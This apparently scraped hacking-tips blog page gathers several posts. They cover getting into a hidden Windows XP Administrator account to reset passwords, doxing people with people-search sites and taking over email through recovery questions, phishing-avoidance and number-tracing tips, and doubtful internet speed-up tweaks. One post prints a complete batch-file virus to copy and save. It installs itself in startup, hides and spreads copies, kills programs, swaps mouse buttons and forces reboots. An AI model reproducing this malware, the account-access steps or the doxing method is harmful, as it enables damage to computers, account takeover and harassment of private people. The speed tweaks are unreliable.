banner

Hacking the admin account

 Simply Accessing the Unprotected Admin or Administrator account.

How this hack works ? When we install windows XP on our system we usually rename the username as our name or some other keyword. But windows always creates the administrator account whenever we set up windows XP. So when you create your user account during install , windows creates two accounts that is one is your username account and other is Administrator account. But the main thing is that you will only see the account with your username and the Administrator account is hidden but its there and you can easily access that using the following steps:
Step1: Start your computer.
Step2: Now let it start until the windows user's username appears as shown in snapshot below...





Step3: As This Window Appears Press Ctrl+Alt +Delete (2 times).. Now the Windows like shown below appears..

 
Step4: Now as shown above Enter the Administrator on the Username box and press enter... Now you will be login in the admin account can easily rest the password...

For Resetting password you can follow two Procedures..
Procedure 1: Goto Start --> Control Panel --> User Accounts.. Now select the account whose password u want to reset.
Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

Note: Hack 1 will only work if Administrator(default) is unsecure.


Enjoy!!!

What Is Doxing? - Doxing And It's Uses

First, let me explain what Doxing is. Doxing is the process of gaining information about someone or something by using sources on the Internet and using basic deduction skills. Its name is derived from “Documents” and in short it is the retrieval of “Documents” on a person or company.


You’re probably thinking, “Okay, so basically it’s getting information from searching someone’s email on Google right?” in a sense yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website called Pipl (http://www.pipl.com/). Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use is Facebook (http://www.facebook.com). Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its email search.


The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your passport online; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it into Facebook or Pipl and he will be able to find you, assuming the email he has is connected to some account you have online. On the flipside of this, in order to find your email, the hacker either has to guess your email, befriend you on Facebook,or, hack one of your vulnerable friends and view your email that way. Once he’s done that, you’re in trouble.


Now, you’re probably thinking, “How’s he going to hack me with just my email?” well, that’s where Doxing comes in handy. If he can view your Facebook account, or he can find some other bit of information about you using Pipl, he can do what’s called reverting. Reverting is the process of using the target’s email’s recovery questions to gain access to the target’s email. Now, you may be thinking, “How’s he gonna guess my recovery question answers?” well, take a second look at your recovery questions and ask yourself, “Can someone find this answer online?” If you answered yes, then you’re vulnerable to reverting.
Any hacker reading this, that didn't previously know about reverting, would probably look at this and say

This would never work!” but you have to remember… we’re all humans, and we all make mistakes. Surprisingly, this method works more often than you’d think, but it is not for anyone who is lazy. Doxers tend to spend a while searching around the web for information that they can use.


Chances are, you’ve made some mistakes online, and if a skilled Doxer finds that mistake, then you’re in trouble. The Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws.”

How can you insure that you won’t be Doxed? Well, as the Internet becomes more and more useful and addicting, it will become harder to not get Doxed. The main issue for most victims is their security questions, and their password security. If a victim has a very easy-to-find recovery question, then the victim will be easily reverted within a matter of seconds. Also, if the victim has a simple password, it could get brute forced simply by using a wordlist that applies to the victim’s interests, likes, and fancies (of course, this method is not as popular).


So, the main rule to not getting hacked is: Have secure passwords, and almost impossible to guess recovery questions. The main rule to not getting Doxed is… to just stay off the Internet; but, who wants to do that?
.

5 Steps To Avoid Email Phishing Attempts



When it comes to the issue of security on the internet, many internet users at times to take much time to care about this, they think that it is not that important but forget to realize that without the knowledge internet security measures, they can be a victim of internet fraud sooner or later.
Email phishing is an act of stealing internet user’s contents (valuable data such as band information, website logging details, your email username and password and some other confidential information like that). This act has turned many people into something else, some have lost properties, business assets and many other valuable things to online phishing attack due to ignorance of the system. If you know how to protect yourself online from this type of wicked people, it will be very easy for you to live your life as you supposed to live it than someone else to tell you how to live it.

Look At the Title of the Message Very Carefully

If you are type of person who regularly receive series of autoresponder messages from some services that you have subscribed to online, you will be able to know if a particular email is fraudulent or if it is legitimate to trust.
The way the autoresponder email series are programmed works well in helping you to know the type of person that is sending it and thereby also making you to have good relationship with the publisher but, also be careful that some of the phishers out-here are cunning in most of the times, they (hackers) too can craft an email in such a way that it will look just the same way like that of a legitimate company that is sending you regular mail on periodic basis.

Compare It With Other Related Title

Another thing that you can do to identify a phishing attempts from the normal email address from a legitimate group or company is by comparing the title of the message with other message that you have received from the company before, though, this also can look somehow confusing because they (phishers)can also make the headline look just the same way that the trusted company or individual usually sent to you. But, one thing that is very certain here is that there will be a difference between the two because the phishers doesn’t know that you are receiving mail from the person and another point is that he’s just trying to have access to your email in order to get more details about you.
So, with this it is very easy to identify them because there type of email will not go straight to the point as the person used to send you message but there’s will be a request, telling you to do this and that and from this you can be able to know if they are truly a genuine company or not.

Email Address Filtering –Identify Real Email Address of the sender

By scanning through the header of the email that this type of people sent to you will help you in knowing fully if the email is a fake or a genuine one. Getting the real address of the person who is sending you an email is another method you can use in knowing either if the person is a legit or not. Check the header of the email if the mail is in HTML format and you will be able to see the true identity of the sender whom sent you the message.

Check The Link Claimed That It Points To The Main Domain Name

You must take this precaution in order to stay save online, before you make any click on emails that you are not quite sure about, you have to hover your mouse on the link for about a second so that you ca be able to see the real link of the website.
The real identity of the website that was embedded in the email will be showed in your web browser status bar immediately you put the mouse on the link, not to click but to hover and look at the status bar. If you notice that the domain name in the link is mis-match, you must know that someone is trying to force you to submit your data in order to hack you thereafter and this can make you loose more information than you can ever think of.

Use Spam Filtering Software

If you are not quite sure of other ways to go, you can make use of spam filtering softwares that can help you block any forms of emails that looks like spam. Though, nowadays some mail client like gmail and yahoomail are now offering this services but it has limits but if you can as well help yourself by getting a spam-filtering software installed on your personal computer, you may not be able to view much of spamming emails in your inbox talk less of you opening it. You can get one email spam filtering software here by downloading the latest version of the Kapersky internet security 2012 or you can also download it from our official download page directly here and then install it on your computer for better security.

Trace a Mobile number


Hi Friends,
Recently I came accross a website in which we can easily trace a Mobile number. For example , when we enter the 10 digit mobile number, then we get the Mobile Service provider, Location, City along with area. Thats really awesome.
This tool will be really helpful specially for business persons to verify the location etc...
The site link is indiatrace.com

Features of this site is

Trace Mobile Number

Trace Vehical Number

Trace Pin Code

Trace IP Address

WHOIS Trace

Enjoy!!!

How to Increase or Speed up Internet Speed



This is a very simple way to increase your internet speed Without using any software or internet speed booster.It is all manual steps.Check the following step to increase your internet speed.
1.Go to desktop->My computer-(right click on)->manage->-Device manager-> now you see a window of – Device manager
2.Then go to Ports->Communication Port (double click on it and Open).
3.After open you can see a Communication Port properties.
4.Go to the Port Setting:-
and  increase your “Bits per second” to 128000.
and “Flow control” change 2 Hardware.
It may not help to increase your internet speed

Hint: To speed up internet, delete all temp files in your computer, because this might a reason for slow internet speed connection

SIMPLE BATCH VIRUS


This one is a simple batch virus
Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don't run this on ur pc

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


------------------------------------------------------------------------------------------
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

How to Increase Internet Speed to Maximum available speed??


Step1 : Right Click on my Computer
Step2 : Selects the Properties Tag
Step3 : Now a New Window opens, Select The Hardware and Then Select Device Manager.
Step4 : Now a  New Window will open . Click on the + sign in front of Ports and select the Communication Ports and Double Click on It.
Step5:  A new window Will Open . Now Select the Port Settings and Chnage the Settings as shown in figure and Click on Ok.

Thats all the Procedure. Now restart your computer and Experience . You will experience that your Internet speed is better than previous.




banner